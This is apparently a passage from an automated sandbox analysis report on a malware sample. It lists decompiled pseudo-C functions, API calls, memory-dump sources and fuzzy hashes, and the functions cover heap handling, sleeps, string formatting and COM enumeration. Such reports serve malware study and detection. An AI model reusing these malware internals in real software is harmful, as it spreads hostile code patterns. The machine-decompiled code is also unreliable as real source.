                                                                                                            0x03032899
                                                                                                            0x00000000
                                                                                                            0x03032899

                                                                                                            APIs
                                                                                                            • StrChrA.SHLWAPI(03032197,0000005F,00000000,00000000,00000104), ref: 0303285E
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 0303288B
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                              • Part of subcall function 03035DDA: lstrlenW.KERNEL32(?,?,?,030329F4,3D0303C0,80000002,03032197,0303258B,74666F53,4D4C4B48,0303258B,?,3D0303C0,80000002,03032197,?), ref: 03035DFF
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 030328AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                            • String ID: ($\
                                                                                                            • API String ID: 3924217599-1512714803
                                                                                                            • Opcode ID: 0f1204eb9b366ab49ec47bfb641b921245c4ee005c4740d861b854a9391ef1a5
                                                                                                            • Instruction ID: 49002f383a76c3d1f23f97f8eecbd29038f84da86b2943f481961addd7f3718b
                                                                                                            • Opcode Fuzzy Hash: 0f1204eb9b366ab49ec47bfb641b921245c4ee005c4740d861b854a9391ef1a5
                                                                                                            • Instruction Fuzzy Hash: A7513876102A0AEFDF22EF64DC40EEA77BDFF4A200F048955FA159A160D735E925DB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05E031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$GetvalsH_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2204710431-1686923651
                                                                                                            • Opcode ID: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction ID: f12773197ed6076ee7b6929c508d3a4268f2a591e3aa1108066664ad95ec3c68
                                                                                                            • Opcode Fuzzy Hash: 48d803e3983f2eafb7dc72b8ca8c8247c581b3c9a1c677fa654f56b8acd633b1
                                                                                                            • Instruction Fuzzy Hash: 6121C1B1904B52AEDB21CF74899077BBFF8AF0D204F040A1EE499C7A82D374E655CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034B98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E03034B98() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x303d364; // 0x53195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x303d364; // 0x53195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x303d364; // 0x53195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x303e823) {
					HeapFree( *0x303d270, 0, _t10);
					_t7 =  *0x303d364; // 0x53195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                            0x03034b98
                                                                                                            0x03034ba1
                                                                                                            0x03034bb1
                                                                                                            0x03034bb1
                                                                                                            0x03034bb6
                                                                                                            0x03034bbb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03034bab
                                                                                                            0x03034bab
                                                                                                            0x03034bbd
                                                                                                            0x03034bc2
                                                                                                            0x03034bc6
                                                                                                            0x03034bd9
                                                                                                            0x03034bdf
                                                                                                            0x03034bdf
                                                                                                            0x03034be8
                                                                                                            0x03034bea
                                                                                                            0x03034bee
                                                                                                            0x03034bf4

                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(05319570), ref: 03034BA1
                                                                                                            • Sleep.KERNEL32(0000000A,?,03035390), ref: 03034BAB
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,03035390), ref: 03034BD9
                                                                                                            • RtlLeaveCriticalSection.NTDLL(05319570), ref: 03034BEE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 58946197-1536154274
                                                                                                            • Opcode ID: b04b0c889b17a88b869da4153b779fb60cd0308d5844f9125a533b7114c50fb5
                                                                                                            • Instruction ID: f7c024fca11ce8824bf68ac285c05edae402d3789bec9749056b889cfabe20f2
                                                                                                            • Opcode Fuzzy Hash: b04b0c889b17a88b869da4153b779fb60cd0308d5844f9125a533b7114c50fb5
                                                                                                            • Instruction Fuzzy Hash: 8BF0F879A07340AFEB18EF65EA99F5937ECFB46300B084409E502DB358C738EC40DA15
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 597776487-0
                                                                                                            • Opcode ID: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction ID: 02289ff33f40289090c1b58290c6c4d0417d53395070ad23ffbfcf0b338e8d53
                                                                                                            • Opcode Fuzzy Hash: a98e9f83df23d522a4e71f08890986b03092bbc5d6636c8edf59f53ab4adb7e0
                                                                                                            • Instruction Fuzzy Hash: 81C11371A08209DFDF108F78CC40BAE7BFDAF86364F14656AD5A49B281F731AA41A750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3033488037-0
                                                                                                            • Opcode ID: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction ID: 27195d4a6bd25ab5779c4fccc23375304620b692334907668d976880b2230131
                                                                                                            • Opcode Fuzzy Hash: 48904d907a675dae2dbeac6fcf09abc75b07d058050d980a57baada8610152bb
                                                                                                            • Instruction Fuzzy Hash: CC51F072A00705AFDB11CF69CD80BAA77F9EF48724F54556AE819DB290F731EA01DB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0567FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$Maklocchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 2020259771-0
                                                                                                            • Opcode ID: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction ID: 8bd3a21cd2ea6de165e37a24b9b0dcf162ab81b194169f2421ee1258edc51282
                                                                                                            • Opcode Fuzzy Hash: 497018d5bf681ea43fd2957ad9186fadbae655563c15be32ada046ba1595cb08
                                                                                                            • Instruction Fuzzy Hash: 94118FB1904745BFE720CBE5D940F12F7ECAB06614F04861AF244CB680D7B4F9608BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction ID: 645f28c00cbc64f63cdc759d2ff3026ed925e175ad1e5e83973181500c503f6c
                                                                                                            • Opcode Fuzzy Hash: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction Fuzzy Hash: 90F09631B09B05978F01CF58E194FD737DDAA097247A8A806F428D7582E730F880AAD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F046020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            • Opcode ID: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction ID: b8c5378a4252ac098d3b0ab02ad0449f8b77eccccc9051a64f554afcca11e8ce
                                                                                                            • Opcode Fuzzy Hash: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction Fuzzy Hash: 4D816571D00615DFCB08CFA8CE90BEDBBB5FB46314F208169D90697292E7386A58EF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303577D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 56%
                                                                                                            			E0303577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x303d380; // 0x5319b28
				_push(0x800);
				_push(0);
				_push( *0x303d270);
				if( *0x303d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x303d284 =  *0x303d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E0303789B(_t44, _t40);
						_t18 = E03033720(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x303d284 < 5) {
								 *0x303d284 =  *0x303d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E030347D5();
						HeapFree( *0x303d270, 0, _t40);
						goto L10;
					}
					_t24 = E030344A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E03036109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                                                                                                            0x0303577d
                                                                                                            0x0303577d
                                                                                                            0x03035780
                                                                                                            0x03035781
                                                                                                            0x0303578b
                                                                                                            0x03035792
                                                                                                            0x03035797
                                                                                                            0x03035799
                                                                                                            0x0303579f
                                                                                                            0x030357c7
                                                                                                            0x030357df
                                                                                                            0x030357e1
                                                                                                            0x030357e2
                                                                                                            0x030357e4
                                                                                                            0x03035822
                                                                                                            0x03035822
                                                                                                            0x03035828
                                                                                                            0x0303582e
                                                                                                            0x0303582e
                                                                                                            0x030357e6
                                                                                                            0x030357ec
                                                                                                            0x030357ef
                                                                                                            0x030357fe
                                                                                                            0x03035800
                                                                                                            0x03035807
                                                                                                            0x0303583b
                                                                                                            0x03035840
                                                                                                            0x03035842
                                                                                                            0x03035844
                                                                                                            0x03035844
                                                                                                            0x00000000
                                                                                                            0x03035842
                                                                                                            0x03035809
                                                                                                            0x0303580e
                                                                                                            0x0303581c
                                                                                                            0x00000000
                                                                                                            0x0303581c
                                                                                                            0x030357d6
                                                                                                            0x030357db
                                                                                                            0x030357db
                                                                                                            0x00000000
                                                                                                            0x030357db
                                                                                                            0x030357a9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x030357b8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 030357A1
                                                                                                              • Part of subcall function 03036109: GetTickCount.KERNEL32 ref: 0303611D
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 0303616D
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 0303618A
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 030361B6
                                                                                                              • Part of subcall function 03036109: HeapFree.KERNEL32(00000000,?), ref: 030361C8
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 030361E9
                                                                                                              • Part of subcall function 03036109: HeapFree.KERNEL32(00000000,?), ref: 030361F9
                                                                                                              • Part of subcall function 03036109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03036227
                                                                                                              • Part of subcall function 03036109: GetTickCount.KERNEL32 ref: 03036238
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 030357BF
                                                                                                            • HeapFree.KERNEL32(00000000,00000002,0303553A,?,0303553A,00000002,?,?,030353C9,?), ref: 0303581C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 1676223858-1536154274
                                                                                                            • Opcode ID: 5e76c50d82a8c811b013dd1ecc40c0d22b7cda3fc381d5d42ff364a4aef074cd
                                                                                                            • Instruction ID: b9a843ac777e32e6172c6b09a5223c0b3b0e1d38699fd27c36d41bbcd7180163
                                                                                                            • Opcode Fuzzy Hash: 5e76c50d82a8c811b013dd1ecc40c0d22b7cda3fc381d5d42ff364a4aef074cd
                                                                                                            • Instruction Fuzzy Hash: 63214C76202209EBDB51EF68DC84EDB37BCEB4A740F140466F902EB250DB74D905DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F05DF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            • Opcode ID: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction ID: 8ca5c308709437c06f76671e914b5d89b186fa76813ba50b197285019482c5bc
                                                                                                            • Opcode Fuzzy Hash: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction Fuzzy Hash: 152190B1904B56AEDB21DF74C990B7BBEF8AB0D204F140A1AE499C7A81D774E611CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                            • Opcode ID: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction ID: 0ebb90cd6f6833f080f0979ab76f45294f4409871a830e26fcc210b76730eb51
                                                                                                            • Opcode Fuzzy Hash: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction Fuzzy Hash: 5E2192B1904B56AED721CF74889077BBEF8AB0D304F140A1AE459CBA81D774E651CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035920, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 46%
                                                                                                            			E03035920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x303d2e0; // 0x22da5a8
					_t5 = _t103 + 0x303e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x303c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x303d2e0; // 0x22da5a8
												_t28 = _t109 + 0x303e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x303d2e0; // 0x22da5a8
														_t33 = _t79 + 0x303e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                                                                            0x03035925
                                                                                                            0x0303592e
                                                                                                            0x0303592f
                                                                                                            0x03035933
                                                                                                            0x03035939
                                                                                                            0x0303593f
                                                                                                            0x03035948
                                                                                                            0x0303594e
                                                                                                            0x03035958
                                                                                                            0x0303595a
                                                                                                            0x03035960
                                                                                                            0x03035965
                                                                                                            0x03035970
                                                                                                            0x03035976
                                                                                                            0x0303597b
                                                                                                            0x03035a9d
                                                                                                            0x03035981
                                                                                                            0x03035981
                                                                                                            0x0303598e
                                                                                                            0x03035994
                                                                                                            0x0303599a
                                                                                                            0x0303599e
                                                                                                            0x030359a4
                                                                                                            0x030359b1
                                                                                                            0x030359b5
                                                                                                            0x030359bb
                                                                                                            0x030359be
                                                                                                            0x030359c6
                                                                                                            0x030359c7
                                                                                                            0x030359cb
                                                                                                            0x030359cf
                                                                                                            0x030359d2
                                                                                                            0x030359d5
                                                                                                            0x030359db
                                                                                                            0x030359e4
                                                                                                            0x030359ea
                                                                                                            0x030359eb
                                                                                                            0x030359ee
                                                                                                            0x030359ef
                                                                                                            0x030359f0
                                                                                                            0x030359f8
                                                                                                            0x030359f9
                                                                                                            0x030359fa
                                                                                                            0x030359fc
                                                                                                            0x03035a00
                                                                                                            0x03035a04
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035a0a
                                                                                                            0x03035a13
                                                                                                            0x03035a19
                                                                                                            0x03035a23
                                                                                                            0x03035a27
                                                                                                            0x03035a29
                                                                                                            0x03035a36
                                                                                                            0x03035a3a
                                                                                                            0x03035a42
                                                                                                            0x03035a47
                                                                                                            0x03035a59
                                                                                                            0x03035a5b
                                                                                                            0x03035a61
                                                                                                            0x03035a61
                                                                                                            0x03035a6a
                                                                                                            0x03035a6a
                                                                                                            0x03035a6c
                                                                                                            0x03035a72
                                                                                                            0x03035a72
                                                                                                            0x03035a75
                                                                                                            0x03035a7b
                                                                                                            0x03035a7e
                                                                                                            0x03035a87
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03035a87
                                                                                                            0x030359db
                                                                                                            0x030359d5
                                                                                                            0x030359be
                                                                                                            0x03035a8d
                                                                                                            0x03035a8d
                                                                                                            0x03035a93
                                                                                                            0x03035a93
                                                                                                            0x03035a99
                                                                                                            0x03035a99
                                                                                                            0x03035aa2
                                                                                                            0x03035aa8
                                                                                                            0x03035aa8
                                                                                                            0x03035965
                                                                                                            0x03035ab1

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(0303C2B0), ref: 03035970
                                                                                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 03035A51
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03035A6A
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 03035A99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloclstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1885612795-0
                                                                                                            • Opcode ID: 12324dfd1badae32da4172b9899ef2375710be32e665598f2983582a3e67d386
                                                                                                            • Instruction ID: 9f9e3e48224b5ec6ce241645f3b9a06320beb9cea71fb0e2eb94798b297c3888
                                                                                                            • Opcode Fuzzy Hash: 12324dfd1badae32da4172b9899ef2375710be32e665598f2983582a3e67d386
                                                                                                            • Instruction Fuzzy Hash: 73513E76D01519EFCB00DFA8C8889EEF7B9FF8A704B148595E915EB224D731AD41CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03033273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 030332AE
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033393
                                                                                                              • Part of subcall function 03035920: SysAllocString.OLEAUT32(0303C2B0), ref: 03035970
                                                                                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 030333E6
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 030333F5
                                                                                                              • Part of subcall function 03033D39: Sleep.KERNEL32(000001F4), ref: 03033D81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3193056040-0
                                                                                                            • Opcode ID: 2ef8665f37597ffb60d92d61f3d7e288db19f0c2a015f4667e23d3c482fc100a
                                                                                                            • Instruction ID: bd03eb85b2326e06eeb671cf1d7cbbffced9fa09fa8ac3e801aae3ba8a893111
                                                                                                            • Opcode Fuzzy Hash: 2ef8665f37597ffb60d92d61f3d7e288db19f0c2a015f4667e23d3c482fc100a
                                                                                                            • Instruction Fuzzy Hash: BC51403A601609EFDB01DFA8C884ADEB7B9FF89700B188969E505DB210DB75ED06CB51
